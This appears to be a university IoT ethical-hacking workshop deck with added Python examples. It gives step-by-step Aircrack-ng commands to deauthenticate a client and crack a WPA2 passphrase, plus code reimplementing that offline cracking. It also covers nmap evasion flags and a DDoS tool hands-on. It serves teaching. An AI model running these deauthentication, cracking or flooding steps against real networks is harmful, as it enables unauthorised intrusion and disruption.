Prepared by:
Jing Hui, Ivan, Syuqri and Claudia
Acknowledgement
IMPORTANT: iTrust acknowledges that any and all software and/or tools presented in this workshop are the sole property of their respective trademark / registered / copyright owners.
Warning!
Please do not use the tools provided for unethical purposes.
Agenda
Time | Item
9.00 – 9.30am | Introduction to iTrust and the Internet of Things (IoT)
9.30 – 10.30am | Introduction to Networking
10.30 – 10.45am | Break
10.45am – 12.30pm | Ethical Hacking and Cyber Security
12.30 – 1.30pm | Lunch
1.30 – 3.30pm | Compromising IoT Devices 1
3.30 – 3.45pm | Break
3.45 – 4.45pm | Compromising IoT Devices 2
4.45 – 4.55pm | Closing
4.55 – 5.25pm | Tour of iTrust labs
5.25 – 5.30pm | Workshop evaluation
Who are we?
(Slide graphic: Funding; Focus Areas – CPS, Enterprise Security, IoT; Collaborators; Distinctive Values)
Section 1: Before We Start…
Cyber Security Considerations
Infrastructure (e.g. banking, energy, water, transport)
Company (e.g. wireless vulnerability, secured networks)
Personal (e.g. data privacy, cybercrime)
Introduction to IoT
• What is IoT?
The internet of things (IoT) is the network of physical devices, vehicles, buildings and other items, embedded with electronics, software, sensors, actuators and network connectivity, that enables these objects to collect and exchange data.
Compromised IoT devices
IoT – Problems
• Additional attack vectors for hackers to compromise: every connected device is another reachable host on the network.
• As the field is relatively new, there are no well-established methods or standards for securing such devices.
• When talking about IoT security, should we be concerned about privacy issues as well?
Section 2: Networks
http://25ffhnaechrbzwf3.onion/
Network – LAN / WAN
Network – IP / MAC Address
How the internet works
OSI 7 Layers
Types of Protocol
What is Wireless Networking?
• Wireless networking is a method by which homes, telecommunications networks and enterprise (business) installations avoid the costly process of introducing cables into a building, or provide a connection between various equipment locations.
Types of wireless transmission
There are 3 different ranges for wireless transmission
Short-range
• Infrared
• Bluetooth
Medium-range
• 802.11a/b/g/n/ac (Wi-Fi)
Long-range
• Worldwide Interoperability for Microwave Access or WiMAX
• Global System for Mobile Communications or GSM
Wireshark
• Wireshark is a network packet/protocol analyzer.
• A network packet analyzer captures network packets and displays the packet data in as much detail as possible, dissecting each protocol layer (Ethernet, IP, TCP, HTTP, ...).
Exercise 1 – Wireshark
1. Observe network traffic
2. Find the 3-way handshake (SYN, SYN/ACK, ACK)
3. Dissect the Skype pcap file to see what information one can find
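Wireshark finds the handshake for you with the display filter `tcp.flags.syn == 1`, but it helps to know what it is actually matching. The following added example (not part of the workshop material) builds a tiny pcap in memory from constructed frames, then walks it with a pure-Python parser and reports only the handshakes whose sequence/acknowledgement numbers actually chain together. The IP addresses, ports and sequence numbers are made up; the file format and header offsets are the real libpcap/Ethernet/IPv4/TCP layouts.

```python
import struct

TCP_SYN, TCP_ACK = 0x02, 0x10


def build_frame(src_ip, dst_ip, sport, dport, seq, ack, flags):
    """Constructed Ethernet/IPv4/TCP frame with no payload and zeroed checksums;
    used only to fabricate a sample capture (example data, not a real trace)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a classic libpcap file (magic 0xa1b2c3d4, link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp(pcap):
    """Yield (src, dst, sport, dport, seq, ack, flags) for every TCP segment in a pcap."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"   # byte order of the file's integers
    off = 24                                        # skip the global header
    while off + 16 <= len(pcap):
        _ts_sec, _ts_usec, caplen, _origlen = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                # not IPv4 over Ethernet
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:
            continue                                # not TCP
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        sport, dport, seq, ack, _doff, flags = struct.unpack_from("!HHIIBB", frame, 14 + ihl)
        yield src, dst, sport, dport, seq, ack, flags


def find_handshakes(pcap):
    """Return completed 3-way handshakes as (client, cport, server, sport) tuples.
    Each step is validated by the sequence arithmetic (ack == previous seq + 1),
    not just by the flag bits, so a mismatched SYN/ACK is not counted."""
    pending, done = {}, []
    for src, dst, sp, dp, seq, ack, flags in iter_tcp(pcap):
        syn, ackf = flags & TCP_SYN, flags & TCP_ACK
        if syn and not ackf:                        # 1. client SYN
            pending[(src, sp, dst, dp)] = ("SYN", seq)
        elif syn and ackf:                          # 2. server SYN/ACK
            key = (dst, dp, src, sp)
            st = pending.get(key)
            if st and st[0] == "SYN" and ack == (st[1] + 1) & 0xFFFFFFFF:
                pending[key] = ("SYNACK", seq)
        elif ackf:                                  # 3. client ACK
            key = (src, sp, dst, dp)
            st = pending.get(key)
            if st and st[0] == "SYNACK" and ack == (st[1] + 1) & 0xFFFFFFFF:
                done.append(key)
                del pending[key]
    return done


def sample_capture():
    """Constructed capture: one clean handshake to port 80 and one bogus exchange
    to port 554 whose SYN/ACK acknowledges the wrong number."""
    c, s = "192.168.0.10", "192.168.0.20"
    return build_pcap([
        build_frame(c, s, 51000, 80, 1000, 0, TCP_SYN),
        build_frame(s, c, 80, 51000, 5000, 1001, TCP_SYN | TCP_ACK),
        build_frame(c, s, 51000, 80, 1001, 5001, TCP_ACK),
        build_frame(c, s, 51001, 554, 2000, 0, TCP_SYN),
        build_frame(s, c, 554, 51001, 7000, 9999, TCP_SYN | TCP_ACK),
        build_frame(c, s, 51001, 554, 2001, 7001, TCP_ACK),
    ])


if __name__ == "__main__":
    data = sample_capture()
    with open("sample_handshake.pcap", "wb") as fh:   # open this file in Wireshark
        fh.write(data)
    for hs in find_handshakes(data):
        print("handshake: %s:%d -> %s:%d" % hs)
```

Open the written `sample_handshake.pcap` in Wireshark and compare: the first three frames are the handshake, and Wireshark's TCP dissector marks the port-554 SYN/ACK as acknowledging a number it never saw, exactly what the sequence check above rejects.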
Summary
• What is a LAN/WAN?
• Components of a network
• How does the internet function?
• Wireless communication and monitoring
• Wireshark
Section 3: Introduction To Ethical Hacking
Hacking Phases
Cyber Kill Chain
Objectives of Reconnaissance
Types of Scanning
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• Default host discovery with admin/root privilege: ARP ping on the local segment; otherwise ICMP echo, ICMP timestamp, TCP SYN to port 443 and TCP ACK to port 80
• Without admin/root privilege: TCP connect() ping to ports 80 and 443 only
• -sn : host discovery only, skip port scanning
• -PE : use an ICMP echo request as the discovery probe
• --send-ip : send raw IP packets instead of ARP requests; takes no argument and only changes behaviour for targets on the same segment
• e.g. nmap -sn -PE --send-ip x.x.x.x
Caution: host discovery is noisy; an IDS (e.g. Snort – snort.org) will log the ICMP and TCP probes.
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• Port scan without host discovery, e.g. nmap -Pn -sS -p 22 --open x.x.x.x/24
• -Pn : skip host discovery and treat every address as up (without -p, nmap would scan its default 1,000 most common ports)
• -sS -p 22 --open : TCP SYN scan of port 22 only; report only hosts where it is open
• x.x.x.x/24 : the network segment to scan
Caution: scanning many ports across a whole segment is slow and noisy, and aggressive scans can crash fragile embedded/IoT devices.
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• -oN : normal output file
• -oG : grepable output file (one line per host, tab-separated fields)
• -oX : XML output file
• -oA : write all three formats at once
• -f : fragment the probe packets (to evade simple packet-filtering devices/IDS)
• -D : decoy addresses (the decoys must be alive, otherwise their unanswered SYNs look like a SYN flood/DoS against the target)
• e.g. nmap -sF x.x.x.x/24 -oN outputfile (FIN scan, normal output)
• e.g. nmap -sS x.x.x.x -D y.y.y.y
Caution: sophisticated/modern packet-filtering devices and application-level firewalls reassemble all IP fragments before inspection, so -f does not evade them.
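The -oG format exists so results can be post-processed instead of read by eye. The following added example (my code, not nmap's and not part of the workshop) parses a constructed grepable-output sample and answers the two questions the exercise asks: which hosts have a given port open, and what services the segment exposes. The IP addresses and scan results in `SAMPLE_GNMAP` are made up; the line layout is nmap's real -oG format.

```python
import re

# Constructed sample of nmap grepable (-oG) output, not a real scan result.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Sat Jan  1 10:00:00 2022 as: nmap -sS -p 22,80,554 -oG scan.gnmap 192.168.0.0/24
Host: 192.168.0.1 ()\tStatus: Up
Host: 192.168.0.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 554/closed/tcp//rtsp///
Host: 192.168.0.7 (camera)\tStatus: Up
Host: 192.168.0.7 (camera)\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http///, 554/open/tcp//rtsp///\tIgnored State: closed (0)
Host: 192.168.0.9 ()\tStatus: Down
# Nmap done at Sat Jan  1 10:00:05 2022 -- 256 IP addresses (2 hosts up) scanned in 5.02 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)")


def parse_gnmap(text):
    """Parse -oG output into {ip: {"hostname", "status", "ports": {(port, proto): (state, service)}}}.
    Each host line is tab-separated: a 'Host:' field followed by 'Status:', 'Ports:' or
    'Ignored State:' fields; each port entry is port/state/proto/owner/service/rpc/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                   # comment/header lines
        fields = line.split("\t")
        ip, name = HOST_RE.match(fields[0]).groups()
        entry = hosts.setdefault(ip, {"hostname": name, "status": "Unknown", "ports": {}})
        for field in fields[1:]:
            if field.startswith("Status:"):
                entry["status"] = field.split(":", 1)[1].strip()
            elif field.startswith("Ports:"):
                entry["status"] = "Up"                 # ports are only listed for hosts that answered
                for item in field.split(":", 1)[1].split(","):
                    parts = item.strip().split("/")
                    port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
                    entry["ports"][(port, proto)] = (state, service)
    return hosts


def hosts_with_open(hosts, port, proto="tcp"):
    """IPs where the given port is open (the question 'nmap ... -p 22 --open' answers)."""
    return sorted(ip for ip, h in hosts.items()
                  if h["ports"].get((port, proto), ("", ""))[0] == "open")


def service_inventory(hosts):
    """service name -> sorted list of (ip, port) where it is open; a quick attack-surface view."""
    inv = {}
    for ip, h in hosts.items():
        for (port, _proto), (state, service) in h["ports"].items():
            if state == "open":
                inv.setdefault(service, []).append((ip, port))
    return {svc: sorted(v) for svc, v in inv.items()}


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    print("port 22 open on:", hosts_with_open(scan, 22))
    for svc, where in service_inventory(scan).items():
        print(svc, where)
```

Feed it a real file with `parse_gnmap(open("scan.gnmap").read())`; because -oA writes the same content with a `.gnmap` suffix, the parser works on that output too.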
Denial of Service (DOS) Attack
Symptoms of a DOS Attack
• Unavailability of a website
• Inability to access any website
• Unusually slow network performance
• Dramatic increase in email spam
Types of DOS / DDOS
Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site; magnitude is measured in bits per second (bps).
Protocol Attacks
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment such as firewalls and load balancers; magnitude is measured in packets per second (pps).
Application Layer Attacks
Includes Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server; magnitude is measured in requests per second (rps).
DDOS Attack (Case Study)
DDOS Attack Tools
• LOIC - Low Orbit Ion Cannon (sourceforge.net/projects/loic/)
• XOIC (sourceforge.net/projects/xoic/)
• HULK - HTTP Unbearable Load King (packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html)
• DDOSIM - Layer 7 DDOS Simulator (sourceforge.net/projects/ddosim/)
• R-U-Dead-Yet (code.google.com/p/r-u-dead-yet/)
• TOR’s Hammer (packetstormsecurity.com/files/98831/)
DDOS Hands-On
LOIC - Low Orbit Ion Cannon
Understanding Malware
Virus. A computer virus attaches itself to a program or file, enabling it to spread from one computer to another, leaving infections as it travels; it needs a human to run the infected file.
Worm. A sub-class of virus that can travel without any human action. A worm takes advantage of file or information transport features on your system (network shares, e-mail, vulnerable services), which is what allows it to travel unaided.
Trojan. Malicious code disguised as legitimate software. It can cause serious damage by deleting files and destroying information on your system, and it can create a backdoor that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. A Trojan does not reproduce or self-replicate.
A blended threat is a more sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and other malicious code into one single threat, as seen in APTs (next slide).
Advanced Persistent Threat (APT)
• An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. The intention of an APT attack is to steal data rather than to cause damage to the network or organization. APT attacks target organizations in sectors with high-value information, such as national defense, manufacturing and the financial industry.
Data Exfiltration Using Advanced Techniques
https://www.youtube.com/watch?v=RChj7Mg3rC4
Summary
• Cyber kill chain
• Nmap
• What is a botnet, DDoS?
• Malware classification
• APTs and how they steal data from an organization
Section 4: Introduction To Cyber Security
Encryption
• What is encryption?
Caesar’s Cipher
• Each letter is replaced by a letter some fixed number of positions down the alphabet.
Encryption
• Take for example the encryption algorithm known as AES, which allows keys of up to 256 bits.
• The formula for counting the key space is
  Number of keys = 2^x
  where x is the number of bits in the key.
• For example, a 2048-bit value has 2^2048 possibilities, whose decimal representation is approximately 3.2317 × 10^616 (a 617-digit number).
• Caveat: that figure describes brute-forcing a symmetric key. An RSA-2048 key is not attacked by guessing all 2^2048 values but by factoring the modulus, so its effective strength is far lower (roughly comparable to a 112-bit symmetric key), which is why RSA keys must be much longer than AES keys for the same security.
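To make the key-space idea concrete, the following added example (mine, not from the workshop) implements the Caesar cipher from the previous slide, recovers the key by trying all 26 shifts, and then puts the 2^x formula beside it: a key space of 26 is about 4.7 bits, which is why exhaustive search works instantly, while the 2^2048 figure above is a 617-digit number. The word list and the "10^12 guesses per second" cracking rate are constructed for the illustration.

```python
import math
import string

ALPHABET = string.ascii_uppercase


def caesar(text, key):
    """Shift every letter `key` positions down the alphabet (a negative key shifts back)."""
    return "".join(ALPHABET[(ALPHABET.index(ch) + key) % 26] if ch in ALPHABET else ch
                   for ch in text.upper())


# Tiny constructed word list used to recognise readable English in candidate plaintexts.
COMMON_WORDS = {"THE", "AND", "ATTACK", "AT", "DAWN", "IS", "TO", "OF", "MEET", "ME"}


def crack_caesar(ciphertext):
    """Exhaustive key search: 26 keys is such a small key space that no dictionary is
    needed, only a way to recognise the right answer. Returns (key, plaintext)."""
    def score(k):
        return sum(word in COMMON_WORDS for word in caesar(ciphertext, -k).split())
    key = max(range(26), key=score)
    return key, caesar(ciphertext, -key)


def key_space(bits):
    """Number of keys for an x-bit key: 2^x, the formula from the slide."""
    return 2 ** bits


def key_bits(n_keys):
    """Inverse view: how many bits of key a cipher with n_keys keys really has."""
    return math.log2(n_keys)


def brute_force_years(bits, guesses_per_second=1e12):
    """Expected time to search half the key space, in years, at a constructed
    rate of 10^12 guesses per second."""
    return key_space(bits) / 2 / guesses_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    ct = caesar("ATTACK AT DAWN", 3)
    print(ct, "->", crack_caesar(ct))
    print("Caesar: 26 keys = %.1f bits" % key_bits(26))
    print("2^2048 has", len(str(key_space(2048))), "decimal digits")
    for bits in (5, 56, 128, 256):
        print(f"{bits}-bit key: {brute_force_years(bits):.3g} years")
```

The 56-bit line is DES, which fell to exhaustive search in the 1990s; the 128-bit line is why AES is attacked through its implementation or its key management, never through the key space.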
Symmetric Encryption
• All algorithms of the symmetric variety use a SINGLE key to encrypt and decrypt information.
• In traditional cryptographic systems, the same key is used by the sender and receiver to both encrypt and decrypt the message.
• Some of the more common algorithms used are 3DES, AES and Blowfish.
Asymmetric Encryption
RSA Algorithm
In RSA, this asymmetry is based on the practical difficulty of factoring the product of two large prime numbers
Key Signing Exercise
• https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/RSAWorksheetv4d.html – asymmetric
• https://encipher.it/ – symmetric
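The worksheet linked above walks through RSA by hand with small primes. The following added example (my code, not the worksheet's and not part of the workshop) does the same arithmetic in Python: key generation, encryption with the public key, decryption with the private key, a signature that verifies with the public key, and finally the attack the slide alludes to: factoring a toy modulus recovers the private key. The primes 61 and 53 are the usual textbook pair; the signature scheme reduces a SHA-256 digest mod n and is a toy, not PKCS#1.

```python
import hashlib
from math import gcd


def keygen(p, q, e=17):
    """Textbook RSA from two primes: n = p*q, phi = (p-1)(q-1), d = e^-1 mod phi.
    Returns (public, private) as ((n, e), (n, d)). Needs Python 3.8+ for pow(e, -1, phi)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return (n, e), (n, pow(e, -1, phi))


def encrypt(public, m):
    n, e = public
    return pow(m, e, n)            # anyone with the public key can do this


def decrypt(private, c):
    n, d = private
    return pow(c, d, n)            # only the holder of d can undo it


def _digest_mod_n(message, n):
    # Toy: reduce SHA-256 of the message mod n. Real RSA signatures pad the hash
    # (PKCS#1 v1.5 / PSS) instead, so do not copy this into production code.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private, message):
    n, d = private
    return pow(_digest_mod_n(message, n), d, n)      # private-key operation on the digest


def verify(public, message, signature):
    n, e = public
    return pow(signature, e, n) == _digest_mod_n(message, n)


def factor(n):
    """Trial division: feasible for a toy modulus, hopeless for a 2048-bit one.
    This gap is the asymmetry RSA relies on."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("no factor found")


def recover_private(public):
    """An attacker who can factor n rebuilds d from the public key alone."""
    n, e = public
    p, q = factor(n)
    return keygen(p, q, e)[1]


if __name__ == "__main__":
    pub, priv = keygen(61, 53)            # the classic worksheet-sized primes
    c = encrypt(pub, 65)
    print("n, e, d =", pub[0], pub[1], priv[1], "| 65 ->", c, "->", decrypt(priv, c))
    sig = sign(priv, b"pay 100")
    print("valid:", verify(pub, b"pay 100", sig), "tampered:", verify(pub, b"pay 1000", sig))
    print("recovered private key:", recover_private(pub) == priv)
```

Run it and compare n = 3233, e = 17, d = 2753 and the ciphertext 2790 with the worksheet; then replace `factor` with a 2048-bit modulus in your head to see why the same step is infeasible for real keys.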
Hashing
• Difference between encryption and hashing? Encryption is reversible by whoever holds the key; a hash is a one-way, fixed-length digest with no key, so the same input always gives the same output and the input cannot be recovered from it.
Password Cracker
Hands-on: Hash Generator
Salting
• In cryptography, a salt is random data used as an additional input to a one-way function that hashes a password or passphrase. The primary function of a salt is to defend against dictionary attacks run against a whole list of password hashes at once, and against pre-computed rainbow-table attacks: with a unique salt per user, identical passwords produce different hashes and every hash has to be attacked separately.
• A salt does not make a weak password strong: each salted hash can still be guessed one at a time, which is why a deliberately slow, iterated hash (PBKDF2, bcrypt, scrypt) is used together with the salt.
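The following added example (mine, not part of the workshop's hash-generator hands-on) shows both halves of the slide in code: a plain SHA-256 password hash falls to a precomputed table and exposes which users share a password, while a per-user random salt with PBKDF2 defeats the table and forces one hash computation per guess per user. The word list and user passwords are constructed; `hashlib.pbkdf2_hmac` is the real standard-library call.

```python
import hashlib
import hmac
import os

# Constructed mini word list standing in for a real password dictionary.
WORDLIST = ["123456", "password", "iloveyou", "letmein", "sunshine", "qwerty"]
ITERATIONS = 50_000   # PBKDF2 rounds; real deployments tune this to ~100 ms per hash


def hash_unsalted(password):
    """What the hash-generator hands-on produces: one fast SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_salted(password, salt=None, iterations=ITERATIONS):
    """Stored form 'salt$iterations$digest' with a fresh 16-byte random salt per user."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(password, stored):
    salt_hex, iterations, _digest = stored.split("$")
    candidate = hash_salted(password, bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, stored)   # constant-time compare


def build_table(words):
    """Precomputed table (the idea behind rainbow tables): hash once, reuse against every dump."""
    return {hash_unsalted(w): w for w in words}


def crack_unsalted(hashes, table):
    """Every hash in the dump is cracked by a dictionary lookup; identical passwords are
    visible as identical hashes before any cracking happens."""
    return {h: table[h] for h in hashes if h in table}


def crack_salted(stored_hashes, words):
    """With salts the table is useless: each hash needs its own PBKDF2 run per guess.
    Returns (cracked {stored: password}, total number of hash computations performed)."""
    cracked, work = {}, 0
    for stored in stored_hashes:
        for w in words:
            work += 1
            if verify_salted(w, stored):
                cracked[stored] = w
                break
    return cracked, work


if __name__ == "__main__":
    users = {"alice": "iloveyou", "bob": "iloveyou", "carol": "correct horse battery"}
    dump = {u: hash_unsalted(p) for u, p in users.items()}
    print("unsalted: alice == bob:", dump["alice"] == dump["bob"])
    print("cracked from table:", crack_unsalted(dump.values(), build_table(WORDLIST)))
    salted = {u: hash_salted(p) for u, p in users.items()}
    print("salted:   alice == bob:", salted["alice"] == salted["bob"])
    print("cracked by per-hash dictionary:", crack_salted(salted.values(), WORDLIST))
```

Note what the salt does and does not do: "iloveyou" is still cracked in three guesses per user, but the attacker pays 50,000 SHA-256 rounds for every guess against every user instead of one table lookup, and "correct horse battery" is not in the list at all.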
In Conclusion
IS ENCRYPTION ENOUGH?!
Reuters reported in December 2013 that the NSA had paid RSA $10 million to make a now-discredited cryptography system the default in software used by a wide range of Internet and computer security programs. The system, called Dual Elliptic Curve (Dual_EC_DRBG), was a random number generator, but it had a deliberate flaw (a "back door") that let whoever held the secret constants predict its output, and therefore recover the keys generated from it, without breaking the cipher itself.
Summary
• Encryption, symmetric and asymmetric
• Hashing
• Difference between encryption and hashing
• Brute force attacks, dictionary attacks and pass the hash
Section 5: The Internet of Not Really Secure Things
Top 10 vulnerabilities for IoT
Communications in IoT
WiFi Recap
• 802.11 standard
• Medium-range communication (tens of metres indoors, a few hundred metres outdoors)
• Now, let’s discuss its security…
Security concerns for WiFi
• WEP – broken: RC4 with short, reused IVs; the key can be recovered from captured traffic in minutes
• WPA – an interim fix (TKIP) for WEP-era hardware, now deprecated
• WPA2 – AES-CCMP, but in Personal (pre-shared key) mode the 4-way handshake can be captured and the passphrase attacked offline with a dictionary, which is what the exercise below does
Bluetooth
• Short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz
• Communicates with a maximum of seven active slave devices in a piconet (an ad-hoc network of Bluetooth devices around one master)
• Key pairing mechanisms
Security concerns for Bluetooth
• Prior to Bluetooth v2.1, encryption is not required and can be turned off at any time
• The legacy PIN-based pairing exchange can be sniffed, and a short PIN brute-forced offline to recover the link key and decrypt the traffic
IP Camera Exercise
Objectives
• Get access into the network
• Identify the IP camera that has been assigned (via MAC address)
• Identify traffic that is essential for getting access to IP camera’s stream
What is a MAC address?
• Media access control address, also called a physical address
• Unique identifier assigned to network interfaces for communications on the physical network segment
• OUI – Organizationally Unique Identifier: the first three octets, purchased by a vendor/manufacturer and assigned by the Institute of Electrical and Electronics Engineers (IEEE)
OUI example: 00:1B:2F:BB:4C:98 – OUI 00:1B:2F identifies the vendor, BB:4C:98 is the vendor-assigned interface identifier
Cracking Wi-Fi password
Step 0
• Type ifconfig to find the wireless interface name, i.e. wlan*
• Navigate to the appropriate directory in the terminal: cd Desktop > cd Scy\ Phy/ > cd Wi\ Fi/
• This navigates into the Scy Phy > Wi Fi folder
Step 1 – Starting monitor mode
• You are required to sniff the wireless traffic to determine which network you want to gain access to.
• For wireless networks, we will be using a suite of tools called Aircrack-ng.
• To go into monitor mode, use the command ‘sudo airmon-ng start XXX’ where XXX is the interface you would like to use. Recent versions create a separate monitor interface (e.g. wlan0mon); use that name in the following steps.
Step 2 – Identify MAC address of AP
• Use the airodump-ng command in the terminal: sudo airodump-ng <interface name>
• This shows a list of available access points (BSSID column) with their MAC address and channel
• Take note of the MAC address and channel of the target access point (AndroidAP)
Step 3 – Capturing packets using airodump
• Firstly, navigate to a folder of choice to store the captured packets. Example: cd Desktop
• Use the airodump-ng command in the terminal as follows: sudo airodump-ng -c <channel> --bssid <MAC address of AP> -w <name of output file> <interface name>
• This starts capturing packets on the access point; the capture is written to <name of output file>-01.cap
Step 4 – Deauthentication using aireplay
• This prompts a reconnection of a target device to the network. Why do we want to do this? Because the WPA2 passphrase itself is never sent over the air; only the 4-way handshake performed when a client (re)connects contains material that can be checked against a passphrase guess, and airodump-ng has to capture it.
• Use the command as follows: sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignore-negative-one
• This deauthenticates the target device and makes it reconnect to the access point.
• Repeat the deauthentication attack several times until airodump-ng shows “WPA handshake: <MAC of AP>” in its top-right corner, confirming the four-way handshake has been captured
Step 5 – Cracking password using aircrack
• This is done using a dictionary attack. Do you remember what a dictionary attack is?
• Use the command as follows: sudo aircrack-ng -w <password list file> -b <MAC of access point> <name of .cap file you have saved>
• If the cracking is successful, the password is shown in the terminal window (“KEY FOUND!”)
• Congratulations on cracking the password!
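What aircrack-ng does with the captured handshake and the word list is not magic, and the following added example (my code, not Aircrack-ng's and not part of the workshop) reproduces it with the standard library: for each candidate passphrase it derives the PMK with PBKDF2 over the SSID, expands it to the PTK with the two MAC addresses and two nonces that are visible in the capture, and checks whether the resulting KCK reproduces the MIC on EAPOL message 2. A match means the passphrase is right. The access point, station, nonces, passphrase and word list are constructed; the PBKDF2 parameters, PRF-512 and MIC computation are the real WPA2-Personal derivations.

```python
import hashlib
import hmac


def pmk(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what makes each dictionary guess cost something."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || B || i),
    with B = min(MACs) || max(MACs) || min(nonces) || max(nonces). Both MACs and both nonces
    are visible in the captured handshake, which is why the passphrase can be tested offline."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + b + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]          # first 16 bytes = KCK, the key that authenticates the EAPOL MIC


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    The MIC occupies bytes 81..96 of the EAPOL-Key frame."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """Constructed EAPOL-Key message 2 (station -> AP) with an empty key-data field."""
    body = (b"\x02"              # descriptor type: RSN
            + b"\x01\x0a"        # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC present
            + b"\x00\x10"        # key length
            + b"\x00" * 8        # replay counter
            + snonce             # 32-byte SNonce
            + b"\x00" * 16       # key IV
            + b"\x00" * 8        # key RSC
            + b"\x00" * 8        # key ID (reserved)
            + mic                # key MIC
            + b"\x00\x00")       # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 = Key


def capture_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Stand-in for what airodump-ng writes to the .cap after the deauth: the station
    computed the MIC with the real passphrase; the attacker sees everything but that."""
    kck = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(snonce))
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": build_eapol_msg2(snonce, mic)}


def crack(handshake, wordlist):
    """What 'aircrack-ng -w wordlist' does: derive PMK -> PTK -> KCK for each candidate
    and see whether it reproduces the captured MIC. Returns (passphrase, guesses)."""
    h = handshake
    captured_mic = h["eapol"][81:97]
    for guesses, candidate in enumerate(wordlist, 1):
        if not 8 <= len(candidate) <= 63:      # WPA2 passphrases are 8-63 characters
            continue
        kck = ptk(pmk(candidate, h["ssid"]), h["ap"], h["sta"], h["anonce"], h["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, h["eapol"]), captured_mic):
            return candidate, guesses
    return None, len(wordlist)


# Constructed handshake parameters (MACs, nonces and passphrase are made up for the example).
AP_MAC, STA_MAC = bytes.fromhex("b0c554112233"), bytes.fromhex("001b2fbb4c98")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "12345678", "AndroidAP", "summer2016!!", "qwertyuiop"]


def demo():
    cap = capture_handshake("summer2016!!", "AndroidAP", AP_MAC, STA_MAC, ANONCE, SNONCE)
    return crack(cap, WORDLIST)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

Two things follow directly from the code: the SSID is a salt, so a PMK table computed for "AndroidAP" is useless against any other network name, and the only cost per guess is one PBKDF2 of 4096 SHA-1 rounds, which is why a long passphrase that is not in any word list is the defence, not a hidden SSID or MAC filtering.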
Hacking IP Camera
Step 1 – Nmap scan on network
